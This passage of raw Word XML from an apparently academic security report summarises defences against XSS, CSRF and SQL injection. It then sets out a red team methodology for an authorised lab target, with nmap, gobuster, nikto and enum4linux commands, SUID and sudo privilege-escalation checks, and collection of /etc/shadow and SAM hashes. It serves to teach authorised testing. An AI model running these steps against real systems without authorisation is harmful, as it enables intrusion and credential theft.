                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71188FFB" w14:textId="56588BE4" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.19 - Safe mode: the UNION payload returns "No matches"; nothing is leaked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54561009" w14:textId="04B20343" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc242295528"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.9  Summary of defences</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="2C557DA4" w14:textId="66C1CB8D" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Each vulnerability is fixed by a standard, well-understood control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45EBBD" w14:textId="2771964A" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>XSS (reflected, stored, DOM): contextual output encoding; use textContent rather than innerHTML for untrusted data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1424A1" w14:textId="25CE124D" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CSRF: per-session synchronizer token on all state-changing requests, plus SameSite cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E71BD08" w14:textId="7C6DBE22" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>SQL injection (all levels): parameterized queries / prepared statements, with input validation as defence-in-depth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7596BF" w14:textId="2C24D6C9" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>All seven attacks were verified succeeding in vulnerable mode and blocked in safe mode. The full source code, payload log (attacks/PAYLOADS.md), and these screenshots are included in the project and committed to a Git repository for submission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8D60C1" w14:textId="7CC5B7EF" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="482E3446" w14:textId="2F98435D" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc242295529"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Part 3 - Red Team Engagement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="2F4CB33E" w14:textId="2C8521EC" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc242295530"/>
      <w:r>
        <w:t>3.1  Scope and rules of engagement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="002223AD" w14:textId="545E8647" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>This engagement is conducted only against the self-contained, intentionally vulnerable lab target assigned for the module (distributed through the course's rotating document). Testing is authorised, time-boxed, and limited to that target. No denial-of-service techniques are used, all actions are logged, and evidence is captured as full-screen screenshots at each phase. The methodology below follows the standard kill-chain: reconnaissance, scanning and enumeration, exploitation, privilege escalation, and post-exploitation, followed by reporting and remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD6BDBA" w14:textId="1C398E52" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc242295531"/>
      <w:r>
        <w:t>3.2  Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="43129A1D" w14:textId="3BAF305D" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Establish the target's reachable surface. For the isolated lab this is primarily active discovery on the lab network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD52AC1" w14:textId="5FD611EB" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Host discovery: nmap -sn &lt;range&gt; to confirm the target is up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1660F2EA" w14:textId="2053AE56" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Record the target IP, any hostname, and the network path (traceroute).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D514474" w14:textId="71BBE39D" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc242295532"/>
      <w:r>
        <w:t>3.3  Scanning and enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="42730810" w14:textId="520931EA" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Identify open ports, running services and their versions - this drives everything that follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D92A504" w14:textId="44F5481A" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nmap -p- -sC -sV -oN scan.txt &lt;target&gt;        # full TCP port + service/version scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t># Per-service enumeration, for example:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>gobuster dir -u http://&lt;target&gt; -w wordlist    # web content discovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>nikto -h http://&lt;target&gt;                        # web server issues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>enum4linux -a &lt;target&gt;                          # SMB / shares / users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6169B47D" w14:textId="2F3E0B4F" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Map each open port to a service and version; note default pages, banners and obvious misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358B2FC6" w14:textId="37B49ADE" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Cross-reference versions against known vulnerabilities (searchsploit &lt;service version&gt;, vendor advisories).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B18857D" w14:textId="06C5E521" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc242295533"/>
      <w:r>
        <w:t>3.4  Exploitation (initial access)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="55D360C3" w14:textId="293407F6" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Turn one confirmed weakness into a foothold - a low-privileged shell. Typical routes in a lab target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B80670" w14:textId="0FDBE296" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>A known CVE in an outdated service (validated with searchsploit, then a vetted PoC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A61A186" w14:textId="2E7E471B" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>A web vulnerability (file upload, command injection, or the XSS/SQLi/CSRF classes demonstrated in Part 2) used to obtain a web shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BF5E96" w14:textId="399C78E9" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Default or weak credentials on an exposed service (SSH, admin panel, database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57327EB0" w14:textId="47331368" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Capture the exact request/command used and a screenshot of the resulting shell (id / whoami showing the low-privileged user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783EAA78" w14:textId="171EC79D" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc242295534"/>
      <w:r>
        <w:t>3.5  Privilege escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="34591D77" w14:textId="59CC2EED" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Escalate from the initial user to root / SYSTEM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E716659" w14:textId="6D119854" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Linux triage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>sudo -l                       # misconfigured sudo rules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>find / -perm -4000 -type f 2&gt;/dev/null   # SUID binaries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>./linpeas.sh                  # automated local enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t># Windows triage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>whoami /priv ; winPEAS.exe    # token privileges, services, misconfigs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441CE47E" w14:textId="23768EA4" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Common wins: writable SUID binary or script, a sudo rule with NOPASSWD, a vulnerable kernel, weak service permissions, or credentials reused from loot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381D790" w14:textId="37379F08" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Confirm escalation with id / whoami showing root or SYSTEM and screenshot it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101ACF92" w14:textId="6F99DCA4" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc242295535"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.6  Post-exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="66EB4CAE" w14:textId="6BE99A6E" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Demonstrate impact, within scope, then clean up:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE2B7DD" w14:textId="73B47FB6" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Loot: collect hashes (/etc/shadow, SAM), configuration files and credentials that prove access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A99EE93" w14:textId="0E626721" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Persistence and pivoting: note how an attacker could persist or move laterally; in a lab, describe rather than deploy destructive persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B05835F" w14:textId="7D8DCADE" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Clean-up: remove uploaded tools and artefacts, and record every change made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53921375" w14:textId="26015E40" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc242295536"/>
      <w:r>
        <w:t>3.7  Reporting and remediation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="3F628277" w14:textId="7C2E4F7D" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Each finding is documented with: a title and severity (CVSS), the affected component, reproduction steps, evidence (screenshots), impact, and a concrete remediation. For the lab target, typical remediations are: patch outdated services, remove default credentials, enforce least privilege (fix sudo/SUID misconfigurations), and apply the input-validation and output-encoding controls demonstrated in Part 2. The engagement concludes with a prioritised remediation list and a retest of the fixed issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE01D02" w14:textId="6FC5AF0A" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Note: the concrete findings, IPs and screenshots for this section are produced by running the methodology above against the specific target currently assigned in the course document, since that target rotates per student and per session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EB8D90" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRPr="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7"/>
    <w:sectPr w:rsidR="00483AA7" w:rsidRPr="00483AA7" w:rsidSect="00483AA7">
      <w:headerReference w:type="even" r:id="rId27"/>
      <w:headerReference w:type="default" r:id="rId28"/>
      <w:footerReference w:type="even" r:id="rId29"/>
      <w:footerReference w:type="default" r:id="rId30"/>
      <w:headerReference w:type="first" r:id="rId31"/>
      <w:footerReference w:type="first" r:id="rId32"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1296" w:right="1440" w:bottom="1296"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F2103BE" w14:textId="77777777" w:rsidR="000822AC" w:rsidRDefault="000822AC" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0DF9D5ED" w14:textId="77777777" w:rsidR="000822AC" w:rsidRDefault="000822AC" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing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Aptos Display">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C2E7924" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="008A10CC">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:framePr w:wrap="around"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rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="3C56670F" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">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EA5A0E" w14:textId="328DAE38" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="008A10CC">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:framePr w:wrap="around"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1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="313170CA" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="360"/>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2AE8DFF" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">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26CFE53" w14:textId="77777777" w:rsidR="000822AC" w:rsidRDefault="000822AC" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="695126E7" w14:textId="77777777" w:rsidR="000822AC" w:rsidRDefault="000822AC" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>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5BB8F61" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">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9F363D5" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">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B542380" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">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89"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FB50D2E0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListBullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="68748605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83AA7"/>
    <w:rsid w:val="000822AC"/>
    <w:rsid w:val="001C2E87"/>
    <w:rsid w:val="00483AA7"/>
    <w:rsid w:val="00B72869"/>
    <w:rsid w:val="00F7607E"/>
  </w:rsids>
  <m:mathPr>
    <m:mathFont m:val="Cambria Math"/>
    <m:brkBin m:val="before"/>
    <m:brkBinSub m:val="--"/>
    <m:smallFrac m:val="0"/>
    <m:dispDef/>
    <m:lMargin m:val="0"/>
    <m:rMargin m:val="0"/>
    <m:defJc m:val="centerGroup"/>
    <m:wrapIndent m:val="1440"/>
    <m:intLim m:val="subSup"/>
    <m:naryLim m:val="undOvr"/>
  </m:mathPr>
  <w:themeFontLang w:val="en-PK" w:bidi="ar-SA"/>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5FC305F1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{97244AA4-44CE-4149-A367-CB869CF5D0A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PK"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after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00483AA7"/>
    <w:pPr>
      <w:spacing w:after="80"/>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483AA7"/>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483AA7"/>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483AA7"/>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483AA7"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00483AA7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00483AA7"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00483AA7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00483AA7"/>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483AA7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00483AA7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00483AA7"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00483AA7"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00483AA7"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00483AA7"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00483AA7"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00483AA7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00483AA7"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00483AA7"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="22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7.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId33" 